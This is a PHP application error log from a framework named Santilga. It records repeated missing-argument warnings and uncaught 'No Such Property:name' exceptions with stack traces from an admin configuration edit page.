#0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined, C:\Server\ptc\libraries\santilga\config\Config.php, 21, Array ()) called at [C:\Server\ptc\libraries\santilga\config\Config.php:21]
#1 Santilga_Config->getParam() called at [C:\Server\ptc\libraries\santilga\object\Object.php:18]
#2 Santilga_Object->__get(param) called at [C:\Server\ptc\application\templates\admin\edit\config.php:18]
#3 include(C:\Server\ptc\application\templates\admin\edit\config.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#4 Santilga_View->renderTemplate(config, edit, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#5 Santilga_View->content(config, edit) called at [C:\Server\ptc\application\controllers\Admin.php:1083]
#6 Admin_Controller->configAddAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 01.07.10 12:09:53- WARNING: Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined in C:\Server\ptc\libraries\santilga\config\Config.php on line 21

#0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined, C:\Server\ptc\libraries\santilga\config\Config.php, 21, Array ()) called at [C:\Server\ptc\libraries\santilga\config\Config.php:21]
#1 Santilga_Config->getParam() called at [C:\Server\ptc\libraries\santilga\object\Object.php:18]
#2 Santilga_Object->__get(param) called at [C:\Server\ptc\application\templates\admin\edit\config.php:18]
#3 include(C:\Server\ptc\application\templates\admin\edit\config.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#4 Santilga_View->renderTemplate(config, edit, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#5 Santilga_View->content(config, edit) called at [C:\Server\ptc\application\controllers\Admin.php:1083]
#6 Admin_Controller->configAddAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 01.07.10 12:09:54- WARNING: Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined in C:\Server\ptc\libraries\santilga\config\Config.php on line 21

#0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined, C:\Server\ptc\libraries\santilga\config\Config.php, 21, Array ()) called at [C:\Server\ptc\libraries\santilga\config\Config.php:21]
#1 Santilga_Config->getParam() called at [C:\Server\ptc\libraries\santilga\object\Object.php:18]
#2 Santilga_Object->__get(param) called at [C:\Server\ptc\application\templates\admin\edit\config.php:18]
#3 include(C:\Server\ptc\application\templates\admin\edit\config.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#4 Santilga_View->renderTemplate(config, edit, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#5 Santilga_View->content(config, edit) called at [C:\Server\ptc\application\controllers\Admin.php:1083]
#6 Admin_Controller->configAddAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 01.07.10 12:09:55- WARNING: Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined in C:\Server\ptc\libraries\santilga\config\Config.php on line 21

#0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined, C:\Server\ptc\libraries\santilga\config\Config.php, 21, Array ()) called at [C:\Server\ptc\libraries\santilga\config\Config.php:21]
#1 Santilga_Config->getParam() called at [C:\Server\ptc\libraries\santilga\object\Object.php:18]
#2 Santilga_Object->__get(param) called at [C:\Server\ptc\application\templates\admin\edit\config.php:18]
#3 include(C:\Server\ptc\application\templates\admin\edit\config.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#4 Santilga_View->renderTemplate(config, edit, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#5 Santilga_View->content(config, edit) called at [C:\Server\ptc\application\controllers\Admin.php:1083]
#6 Admin_Controller->configAddAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 01.07.10 12:09:56- WARNING: Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined in C:\Server\ptc\libraries\santilga\config\Config.php on line 21

#0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined, C:\Server\ptc\libraries\santilga\config\Config.php, 21, Array ()) called at [C:\Server\ptc\libraries\santilga\config\Config.php:21]
#1 Santilga_Config->getParam() called at [C:\Server\ptc\libraries\santilga\object\Object.php:18]
#2 Santilga_Object->__get(param) called at [C:\Server\ptc\application\templates\admin\edit\config.php:18]
#3 include(C:\Server\ptc\application\templates\admin\edit\config.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#4 Santilga_View->renderTemplate(config, edit, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#5 Santilga_View->content(config, edit) called at [C:\Server\ptc\application\controllers\Admin.php:1083]
#6 Admin_Controller->configAddAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 01.07.10 12:09:57- WARNING: Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined in C:\Server\ptc\libraries\santilga\config\Config.php on line 21

#0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined, C:\Server\ptc\libraries\santilga\config\Config.php, 21, Array ()) called at [C:\Server\ptc\libraries\santilga\config\Config.php:21]
#1 Santilga_Config->getParam() called at [C:\Server\ptc\libraries\santilga\object\Object.php:18]
#2 Santilga_Object->__get(param) called at [C:\Server\ptc\application\templates\admin\edit\config.php:18]
#3 include(C:\Server\ptc\application\templates\admin\edit\config.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#4 Santilga_View->renderTemplate(config, edit, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#5 Santilga_View->content(config, edit) called at [C:\Server\ptc\application\controllers\Admin.php:1083]
#6 Admin_Controller->configAddAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 01.07.10 12:09:58- WARNING: Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined in C:\Server\ptc\libraries\santilga\config\Config.php on line 21

#0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined, C:\Server\ptc\libraries\santilga\config\Config.php, 21, Array ()) called at [C:\Server\ptc\libraries\santilga\config\Config.php:21]
#1 Santilga_Config->getParam() called at [C:\Server\ptc\libraries\santilga\object\Object.php:18]
#2 Santilga_Object->__get(param) called at [C:\Server\ptc\application\templates\admin\edit\config.php:18]
#3 include(C:\Server\ptc\application\templates\admin\edit\config.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#4 Santilga_View->renderTemplate(config, edit, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#5 Santilga_View->content(config, edit) called at [C:\Server\ptc\application\controllers\Admin.php:1083]
#6 Admin_Controller->configAddAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 01.07.10 12:09:59- WARNING: Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined in C:\Server\ptc\libraries\santilga\config\Config.php on line 21

#0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined, C:\Server\ptc\libraries\santilga\config\Config.php, 21, Array ()) called at [C:\Server\ptc\libraries\santilga\config\Config.php:21]
#1 Santilga_Config->getParam() called at [C:\Server\ptc\libraries\santilga\object\Object.php:18]
#2 Santilga_Object->__get(param) called at [C:\Server\ptc\application\templates\admin\edit\config.php:18]
#3 include(C:\Server\ptc\application\templates\admin\edit\config.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#4 Santilga_View->renderTemplate(config, edit, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#5 Santilga_View->content(config, edit) called at [C:\Server\ptc\application\controllers\Admin.php:1083]
#6 Admin_Controller->configAddAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 01.07.10 12:10:00- WARNING: Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined in C:\Server\ptc\libraries\santilga\config\Config.php on line 21

#0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined, C:\Server\ptc\libraries\santilga\config\Config.php, 21, Array ()) called at [C:\Server\ptc\libraries\santilga\config\Config.php:21]
#1 Santilga_Config->getParam() called at [C:\Server\ptc\libraries\santilga\object\Object.php:18]
#2 Santilga_Object->__get(param) called at [C:\Server\ptc\application\templates\admin\edit\config.php:18]
#3 include(C:\Server\ptc\application\templates\admin\edit\config.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#4 Santilga_View->renderTemplate(config, edit, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#5 Santilga_View->content(config, edit) called at [C:\Server\ptc\application\controllers\Admin.php:1083]
#6 Admin_Controller->configAddAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 01.07.10 12:10:01- WARNING: Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined in C:\Server\ptc\libraries\santilga\config\Config.php on line 21

#0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined, C:\Server\ptc\libraries\santilga\config\Config.php, 21, Array ()) called at [C:\Server\ptc\libraries\santilga\config\Config.php:21]
#1 Santilga_Config->getParam() called at [C:\Server\ptc\libraries\santilga\object\Object.php:18]
#2 Santilga_Object->__get(param) called at [C:\Server\ptc\application\templates\admin\edit\config.php:18]
#3 include(C:\Server\ptc\application\templates\admin\edit\config.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#4 Santilga_View->renderTemplate(config, edit, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#5 Santilga_View->content(config, edit) called at [C:\Server\ptc\application\controllers\Admin.php:1083]
#6 Admin_Controller->configAddAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 01.07.10 12:10:02- WARNING: Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined in C:\Server\ptc\libraries\santilga\config\Config.php on line 21

#0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined, C:\Server\ptc\libraries\santilga\config\Config.php, 21, Array ()) called at [C:\Server\ptc\libraries\santilga\config\Config.php:21]
#1 Santilga_Config->getParam() called at [C:\Server\ptc\libraries\santilga\object\Object.php:18]
#2 Santilga_Object->__get(param) called at [C:\Server\ptc\application\templates\admin\edit\config.php:18]
#3 include(C:\Server\ptc\application\templates\admin\edit\config.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#4 Santilga_View->renderTemplate(config, edit, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#5 Santilga_View->content(config, edit) called at [C:\Server\ptc\application\controllers\Admin.php:1083]
#6 Admin_Controller->configAddAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 01.07.10 12:10:03- WARNING: Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined in C:\Server\ptc\libraries\santilga\config\Config.php on line 21

#0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined, C:\Server\ptc\libraries\santilga\config\Config.php, 21, Array ()) called at [C:\Server\ptc\libraries\santilga\config\Config.php:21]
#1 Santilga_Config->getParam() called at [C:\Server\ptc\libraries\santilga\object\Object.php:18]
#2 Santilga_Object->__get(param) called at [C:\Server\ptc\application\templates\admin\edit\config.php:18]
#3 include(C:\Server\ptc\application\templates\admin\edit\config.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#4 Santilga_View->renderTemplate(config, edit, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#5 Santilga_View->content(config, edit) called at [C:\Server\ptc\application\controllers\Admin.php:1083]
#6 Admin_Controller->configAddAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 01.07.10 12:10:04- WARNING: Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined in C:\Server\ptc\libraries\santilga\config\Config.php on line 21

#0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined, C:\Server\ptc\libraries\santilga\config\Config.php, 21, Array ()) called at [C:\Server\ptc\libraries\santilga\config\Config.php:21]
#1 Santilga_Config->getParam() called at [C:\Server\ptc\libraries\santilga\object\Object.php:18]
#2 Santilga_Object->__get(param) called at [C:\Server\ptc\application\templates\admin\edit\config.php:18]
#3 include(C:\Server\ptc\application\templates\admin\edit\config.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#4 Santilga_View->renderTemplate(config, edit, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#5 Santilga_View->content(config, edit) called at [C:\Server\ptc\application\controllers\Admin.php:1083]
#6 Admin_Controller->configAddAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 01.07.10 12:10:05- WARNING: Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined in C:\Server\ptc\libraries\santilga\config\Config.php on line 21

#0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined, C:\Server\ptc\libraries\santilga\config\Config.php, 21, Array ()) called at [C:\Server\ptc\libraries\santilga\config\Config.php:21]
#1 Santilga_Config->getParam() called at [C:\Server\ptc\libraries\santilga\object\Object.php:18]
#2 Santilga_Object->__get(param) called at [C:\Server\ptc\application\templates\admin\edit\config.php:18]
#3 include(C:\Server\ptc\application\templates\admin\edit\config.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#4 Santilga_View->renderTemplate(config, edit, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#5 Santilga_View->content(config, edit) called at [C:\Server\ptc\application\controllers\Admin.php:1083]
#6 Admin_Controller->configAddAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 01.07.10 12:10:06- WARNING: Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined in C:\Server\ptc\libraries\santilga\config\Config.php on line 21

#0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined, C:\Server\ptc\libraries\santilga\config\Config.php, 21, Array ()) called at [C:\Server\ptc\libraries\santilga\config\Config.php:21]
#1 Santilga_Config->getParam() called at [C:\Server\ptc\libraries\santilga\object\Object.php:18]
#2 Santilga_Object->__get(param) called at [C:\Server\ptc\application\templates\admin\edit\config.php:18]
#3 include(C:\Server\ptc\application\templates\admin\edit\config.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#4 Santilga_View->renderTemplate(config, edit, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#5 Santilga_View->content(config, edit) called at [C:\Server\ptc\application\controllers\Admin.php:1083]
#6 Admin_Controller->configAddAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 01.07.10 12:10:07- WARNING: Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined in C:\Server\ptc\libraries\santilga\config\Config.php on line 21

#0 Santilga_Error->ErrorHandler(2, Missing argument 1 for Santilga_Config::getParam(), called in C:\Server\ptc\libraries\santilga\object\Object.php on line 18 and defined, C:\Server\ptc\libraries\santilga\config\Config.php, 21, Array ()) called at [C:\Server\ptc\libraries\santilga\config\Config.php:21]
#1 Santilga_Config->getParam() called at [C:\Server\ptc\libraries\santilga\object\Object.php:18]
#2 Santilga_Object->__get(param) called at [C:\Server\ptc\application\templates\admin\edit\config.php:18]
#3 include(C:\Server\ptc\application\templates\admin\edit\config.php) called at [C:\Server\ptc\libraries\santilga\view\View.php:43]
#4 Santilga_View->renderTemplate(config, edit, ) called at [C:\Server\ptc\libraries\santilga\view\View.php:138]
#5 Santilga_View->content(config, edit) called at [C:\Server\ptc\application\controllers\Admin.php:1083]
#6 Admin_Controller->configAddAction() called at [C:\Server\ptc\libraries\santilga\controller\Controller.php:131]
#7 Santilga_Controller->dispatch() called at [C:\Server\ptc\libraries\santilga\application\Application.php:49]
#8 Santilga_Application->run() called at [C:\Server\ptc\index.php:37]
Error!! 01.07.10 12:11:33- WARNING: ob_start() [ref.outcontrol]: output handler 'ob_gzhandler' cannot be used twice in C:\Server\ptc\libraries\santilga\error\Error.php on line 156

#0 Santilga_Error->ErrorHandler(2, ob_start() [ref.outcontrol]: output handler 'ob_gzhandler' cannot be used twice, C:\Server\ptc\libraries\santilga\error\Error.php, 156, Array ([exception] => Santilga_Object_Exception Object ([] => No Such Property:name,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\admin\edit\config.php,[line] => 18,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => name)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\admin\edit\config.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => config,[1] => edit,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Admin.php,[line] => 1083,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => config,[1] => edit)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => configAddAction,[class] => Admin_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ())))))
#1 ob_start(ob_gzhandler) called at [C:\Server\ptc\libraries\santilga\error\Error.php:156]
#2 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:name,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\admin\edit\config.php,[line] => 18,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => name)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\admin\edit\config.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => config,[1] => edit,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Admin.php,[line] => 1083,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => config,[1] => edit)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => configAddAction,[class] => Admin_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 01.07.10 12:12:08- Uncaught Santilga_Object_Exception, code: 0,Message: No Such Property:name

#0 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:name,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\admin\edit\config.php,[line] => 18,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => name)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\admin\edit\config.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => config,[1] => edit,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Admin.php,[line] => 1083,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => config,[1] => edit)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => configAddAction,[class] => Admin_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 01.07.10 12:17:39- Uncaught Santilga_Object_Exception, code: 0,Message: No Such Property:name

#0 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:name,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\admin\edit\config.php,[line] => 18,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => name)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\admin\edit\config.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => config,[1] => edit,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Admin.php,[line] => 1083,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => config,[1] => edit)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => configAddAction,[class] => Admin_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 01.07.10 12:32:25- Uncaught Santilga_Object_Exception, code: 0,Message: No Such Property:name

#0 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:name,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\admin\edit\config.php,[line] => 18,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => name)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\admin\edit\config.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => config,[1] => edit,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Admin.php,[line] => 1083,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => config,[1] => edit)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => configAddAction,[class] => Admin_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 01.07.10 12:37:21- Uncaught Santilga_Object_Exception, code: 0,Message: No Such Property:name

#0 Santilga_Error->ExceptionHandler(Santilga_Object_Exception Object ([] => No Such Property:name,[] => ,[] => 0,[] => C:\Server\ptc\libraries\santilga\object\Object.php,[] => 20,[] => Array ([0] => Array ([file] => C:\Server\ptc\application\templates\admin\edit\config.php,[line] => 18,[function] => __get,[class] => Santilga_Object,[type] => ->,[args] => Array ([0] => name)),[1] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 43,[args] => Array ([0] => C:\Server\ptc\application\templates\admin\edit\config.php),[function] => include),[2] => Array ([file] => C:\Server\ptc\libraries\santilga\view\View.php,[line] => 138,[function] => renderTemplate,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => config,[1] => edit,[2] => )),[3] => Array ([file] => C:\Server\ptc\application\controllers\Admin.php,[line] => 1083,[function] => content,[class] => Santilga_View,[type] => ->,[args] => Array ([0] => config,[1] => edit)),[4] => Array ([file] => C:\Server\ptc\libraries\santilga\controller\Controller.php,[line] => 131,[function] => configAddAction,[class] => Admin_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:\Server\ptc\libraries\santilga\application\Application.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:\Server\ptc\index.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))
Error!! 01.07.10 12:38:26- Uncaught Santilga_Object_Exception, code: 0,Message: No Such Property:name

